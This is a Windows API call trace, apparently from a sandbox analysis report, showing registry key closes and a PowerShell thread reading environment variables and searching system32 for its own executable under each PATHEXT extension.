	[0309.758] RegCloseKey (hKey=0x354) returned 0x0
	[0309.758] RegCloseKey (hKey=0x350) returned 0x0
	[0309.758] RegCloseKey (hKey=0x3a0) returned 0x0
	[0309.758] RegCloseKey (hKey=0x340) returned 0x0
	[0309.759] RegCloseKey (hKey=0x33c) returned 0x0
	[0309.759] RegCloseKey (hKey=0x338) returned 0x0
	[0309.759] RegCloseKey (hKey=0x334) returned 0x0
	[0309.759] RegCloseKey (hKey=0x330) returned 0x0
	[0309.760] RegCloseKey (hKey=0x1cc) returned 0x0
	[0309.760] RegCloseKey (hKey=0x308) returned 0x0
	[0309.760] RegCloseKey (hKey=0x304) returned 0x0
	[0309.760] RegCloseKey (hKey=0x39c) returned 0x0
	[0309.761] RegCloseKey (hKey=0x328) returned 0x0
	[0309.761] RegCloseKey (hKey=0x32c) returned 0x0
	[0309.761] RegCloseKey (hKey=0x398) returned 0x0
	[0309.761] RegCloseKey (hKey=0x394) returned 0x0
	[0309.762] RegCloseKey (hKey=0x370) returned 0x0
	[0328.267] RegCloseKey (hKey=0x3a0) returned 0x0

Thread:
	id = 173
	os_tid = 0x5e4


Thread:
	id = 282
	os_tid = 0xe10

	[0315.670] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0315.674] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0315.679] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.679] CoTaskMemFree (pv=0x471f80) 
	[0315.680] VirtualQuery (in: lpAddress=0x1c7ddb60, lpBuffer=0x1c7dea20, dwLength=0x30 | out: lpBuffer=0x1c7dea20*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.684] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.684] CoTaskMemFree (pv=0x471f80) 
	[0315.686] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.686] CoTaskMemFree (pv=0x471f80) 
	[0315.690] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.690] CoTaskMemFree (pv=0x471f80) 
	[0315.700] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.700] CoTaskMemFree (pv=0x471f80) 
	[0315.702] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.702] CoTaskMemFree (pv=0x471f80) 
	[0315.704] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.704] CoTaskMemFree (pv=0x471f80) 
	[0315.708] VirtualQuery (in: lpAddress=0x1c7dde10, lpBuffer=0x1c7decd0, dwLength=0x30 | out: lpBuffer=0x1c7decd0*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0315.709] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.709] CoTaskMemFree (pv=0x471f80) 
	[0315.712] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.712] CoTaskMemFree (pv=0x471f80) 
	[0315.712] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.712] CoTaskMemFree (pv=0x471f80) 
	[0315.713] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0315.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.713] CoTaskMemFree (pv=0x471f80) 
	[0316.108] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.108] CoTaskMemFree (pv=0x471f80) 
	[0316.548] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.548] CoTaskMemFree (pv=0x471f80) 
	[0316.550] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.550] CoTaskMemFree (pv=0x471f80) 
	[0316.552] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.552] CoTaskMemFree (pv=0x471f80) 
	[0316.554] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.555] CoTaskMemFree (pv=0x471f80) 
	[0316.556] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.556] CoTaskMemFree (pv=0x471f80) 
	[0316.558] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.558] CoTaskMemFree (pv=0x471f80) 
	[0316.560] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.560] CoTaskMemFree (pv=0x471f80) 
	[0316.578] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0316.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.578] CoTaskMemFree (pv=0x471f80) 
	[0317.210] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0317.210] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0317.210] CoTaskMemFree (pv=0x471f80) 
	[0317.214] CoTaskMemAlloc (cb=0x104) returned 0x471f80
	[0317.214] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x471f80, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0317.214] CoTaskMemFree (pv=0x471f80) 
	[0317.214] CoTaskMemAlloc (cb=0x128) returned 0x50f3c0
	[0317.214] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x50f3c0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0317.215] CoTaskMemFree (pv=0x50f3c0) 
	[0317.220] CoTaskMemAlloc (cb=0x20e) returned 0x46b7f0
	[0317.220] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x46b7f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0317.220] CoTaskMemFree (pv=0x46b7f0) 
	[0317.224] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0317.225] SetErrorMode (uMode=0x1) returned 0x1
	[0317.228] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.869] SetErrorMode (uMode=0x1) returned 0x1
	[0324.204] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.204] SetErrorMode (uMode=0x1) returned 0x1
	[0324.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.213] SetErrorMode (uMode=0x1) returned 0x1
	[0324.214] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.214] SetErrorMode (uMode=0x1) returned 0x1
	[0324.214] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.222] SetErrorMode (uMode=0x1) returned 0x1
	[0324.224] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.224] SetErrorMode (uMode=0x1) returned 0x1
	[0324.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.232] SetErrorMode (uMode=0x1) returned 0x1
	[0324.234] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.234] SetErrorMode (uMode=0x1) returned 0x1
	[0324.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.974] SetErrorMode (uMode=0x1) returned 0x1
	[0324.976] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.976] SetErrorMode (uMode=0x1) returned 0x1
	[0324.976] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.984] SetErrorMode (uMode=0x1) returned 0x1
	[0324.986] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.986] SetErrorMode (uMode=0x1) returned 0x1
	[0324.986] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.997] SetErrorMode (uMode=0x1) returned 0x1
	[0324.999] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.999] SetErrorMode (uMode=0x1) returned 0x1
	[0324.999] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.007] SetErrorMode (uMode=0x1) returned 0x1
	[0325.009] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.009] SetErrorMode (uMode=0x1) returned 0x1
	[0325.009] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.938] SetErrorMode (uMode=0x1) returned 0x1
	[0325.940] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.940] SetErrorMode (uMode=0x1) returned 0x1
	[0325.940] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.948] SetErrorMode (uMode=0x1) returned 0x1
	[0325.949] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.949] SetErrorMode (uMode=0x1) returned 0x1
	[0325.949] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.957] SetErrorMode (uMode=0x1) returned 0x1
	[0325.959] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.959] SetErrorMode (uMode=0x1) returned 0x1
	[0325.959] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.967] SetErrorMode (uMode=0x1) returned 0x1
	[0325.968] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.968] SetErrorMode (uMode=0x1) returned 0x1
	[0325.968] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.976] SetErrorMode (uMode=0x1) returned 0x1
	[0325.977] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.978] SetErrorMode (uMode=0x1) returned 0x1
	[0325.978] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.892] SetErrorMode (uMode=0x1) returned 0x1
	[0326.894] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.894] SetErrorMode (uMode=0x1) returned 0x1
	[0326.894] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.902] SetErrorMode (uMode=0x1) returned 0x1
	[0326.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.904] SetErrorMode (uMode=0x1) returned 0x1
	[0326.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.904] SetErrorMode (uMode=0x1) returned 0x1
	[0326.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.905] SetErrorMode (uMode=0x1) returned 0x1
	[0326.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.905] SetErrorMode (uMode=0x1) returned 0x1
	[0326.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.905] SetErrorMode (uMode=0x1) returned 0x1
	[0326.905] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.906] SetErrorMode (uMode=0x1) returned 0x1
	[0326.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.906] SetErrorMode (uMode=0x1) returned 0x1
	[0326.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
